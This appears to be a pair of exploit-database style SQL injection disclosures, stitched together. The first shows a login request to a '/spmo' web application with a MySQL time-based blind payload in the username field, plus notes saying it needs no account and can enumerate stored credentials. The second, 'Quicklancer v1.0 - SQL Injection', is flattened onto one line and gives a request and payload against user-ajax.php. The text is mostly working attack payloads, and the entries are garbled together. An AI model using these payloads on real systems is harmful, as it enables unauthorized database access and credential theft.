# CVE: N/A

### Request ###

POST /spmo/auth/login HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://localhost/spmo/
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Content-Length: 104
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1*

### Parameter & Payloads ###

Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1') AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg

Note: the injection point is the login form itself (POST /spmo/auth/login), so no account is required — only a fresh csrf value taken from the login page, since the one shown is bound to the author's session. The `1')` prefix of the payload shows the username is interpolated inside a parenthesised, single-quoted expression of the login query; a time-based blind injection on the credential check typically also allows enumerating stored credentials, which makes this a pre-authentication issue of high impact for an internet-facing install.
-
Quicklancer v1.0 - SQL Injection
# Exploit Title: Quicklancer v1.0 - SQL Injection # Date: 2023-05-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135 # Demo Site: https://quicklancer.bylancer.com # Tested on: Kali Linux # CVE: N/A ### Request ### POST /php/user-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: */* x-requested-with: XMLHttpRequest Referer: https://localhost Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2; quickjob_view_counted=31; Quick_lang=arabic Content-Length: 93 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive action=searchStateCountry&dataString=deneme ### Parameter & Payloads ### Parameter: dataString (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068 FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo